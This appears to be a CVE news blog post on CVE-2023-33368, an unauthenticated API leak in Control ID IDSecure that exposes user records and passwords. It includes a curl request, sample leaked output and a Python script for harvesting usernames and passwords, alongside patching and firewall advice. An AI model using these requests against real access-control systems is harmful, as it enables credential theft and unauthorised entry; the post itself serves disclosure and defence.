CVE CyberSecurity Database News

CVE-2023-33368 - API Leaks in Control ID IDSecure 4.7.26. Expose Sensitive Data and Passwords

Poster -

---

Control ID IDSecure is a popular access control system used in many organizations to manage secure entry and biometric information. However, in version 4.7.26. and earlier, a critical vulnerability has been discovered, cataloged as CVE-2023-33368. This vulnerability could allow attackers to access a series of API endpoints that unintentionally leak sensitive information—including plain-text passwords—without authentication.

In this comprehensive post, we will explore this vulnerability in simple American English. We’ll show how it works, include sample code, share references, and, for educational purposes only, detail how these API routes can be abused.

What is CVE-2023-33368?

CVE-2023-33368 refers to an information disclosure bug in the Control ID IDSecure system. Some API endpoints do not require authentication, leaving them open to anyone on the network. With just simple API calls, an attacker can gather critical data, like:

Example: Exploiting the Vulnerability

Suppose the IDSecure server runs at http://192.168.1.100/. By default, it exposes an unauthenticated API route like:

GET http://192.168.1.100/api/users

An attacker could simply use their browser or a tool like curl or Postman to make a GET request

curl http://192.168.1.100/api/users

The response might look like this (real output is often in JSON)

[
    {
        "id": 1,
        "username": "admin",
        "fullname": "John Doe",
        "email": "admin@example.com",
        "card_number": "123456789",
        "password": "SuperSecurePassword123"
    },
    {
        "id": 2,
        "username": "jane",
        "fullname": "Jane Smith",
        "email": "jane@example.com",
        "card_number": "0987654321",
        "password": "MyPassword456"
    }
]

Yes—the passwords are fully visible, sometimes in plaintext. No login, token, or cookie required!

Here are some endpoints reportedly affected

- /api/users
- /api/cards
- /api/groups
- /api/logs

To automate the data exfiltration, you could use a simple Python script

import requests

# Target server's IP address or hostname
url = 'http://192.168.1.100/api/users'

try:
    response = requests.get(url)
    if response.ok:
        users = response.json()
        for user in users:
            print(f"User: {user['username']}, Password: {user['password']}")
    else:
        print("No data or server error.")
except Exception as e:
    print(f"Something went wrong: {e}")

*Again, running this script against any system you don’t own is illegal.* This code is for educational and authorized testing only!

CVE Record:

https://nvd.nist.gov/vuln/detail/CVE-2023-33368

Exploit Database:

https://www.exploit-db.com/exploits/51418

Vendor Advisory:

No official patch as of the knowledge cutoff. Contact Control ID for updates.

Immediately upgrade to the latest version if available.

- If no patch exists, block external (and internal) access to the vulnerable API routes using a firewall or reverse proxy.
- Perform a user and access audit; change all users’ passwords—especially if the system was on a busy network.

Conclusion

Exposed API endpoints in Control ID IDSecure 4.7.26. and earlier (CVE-2023-33368), make it trivial for an attacker to harvest usernames, emails, card IDs, and even plain-text passwords. Organizations must act fast to plug this hole—either by patching, blocking, or both.

Pro Tip: Always check web APIs for authentication and never store or display plain-text passwords in responses.

Stay safe, keep your systems updated, and help others be aware of hidden API dangers like these.

*For more technical details, check the official CVE page.*

Timeline

Published on: 08/03/2023 01:15:00 UTC
Last modified on: 08/04/2023 20:15:00 UTC